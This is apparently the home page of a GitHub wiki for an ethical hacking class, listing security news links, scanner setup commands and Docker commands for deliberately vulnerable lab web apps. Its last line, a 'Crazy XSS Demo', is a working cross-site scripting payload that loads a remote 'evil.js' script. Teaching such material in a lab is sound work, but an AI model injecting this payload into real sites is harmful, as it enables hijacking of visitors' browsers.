Home - cloudsecuritylabs/ethicalhackingclass GitHub Wiki

About Ankan

Songs - Basu as a Musician!

Deepfake

https://www.businessinsider.in/tech/news/everyone-looked-real-deepfake-video-meeting-scam-with-ceos-digital-avatar-costs-company-25-6-mn/articleshow/107418961.cms

GDPR enforcement tracker

DNStwist

https://dnstwist.it/

ISO river

  • for downloading OS images

Interesting Read on number of attacks

Real time cyber attack maps

Vulnerability Scanners

OpenVAS https://192.168.0.200

Nessus https://192.168.0.200:8834/

  • sudo docker pull tenableofficial/nessus
  • sudo docker run -d -p 8834:8834 -e ACTIVATION_CODE=YOUR-OWN-CODE -e USERNAME=admin -e PASSWORD=admin --name nessus tenableofficial/nessus
  • visit https://IP:8834

Qualys

Kahoot

Setup Vulnerable Webapps

bWAPP - An extremely buggy web app

Zero Bank

Juice Shop

Metasploitable http://192.168.0.200:9999/

Broken Web App http://192.168.0.202/

XVWA http://192.168.0.200:9090/xvwa/

  • Xtreme Vulnerable Web Application - https://github.com/0xL1mb0/xvwa-1 [use Docker - https://github.com/tuxotron/xvwa_lamp_container]
  • sudo docker run --name xvwa -d -p 9090:80 tuxotron/xvwa

Class Notes:

Tools for taking notes

Cool resources

Welcome to the ethical hacking class wiki!

Worlds Biggest Data Breaches

Security Podcast

The height of windows patch

MySpace Sam Kamkar

https://www.youtube.com/watch?v=DtnuaHl378M

Crazy XSS Demo

<img src=1 onerror="s=document.createElement('script');s.src='//xss-doc.appspot.com/static/evil.js';document.body.appendChild(s);">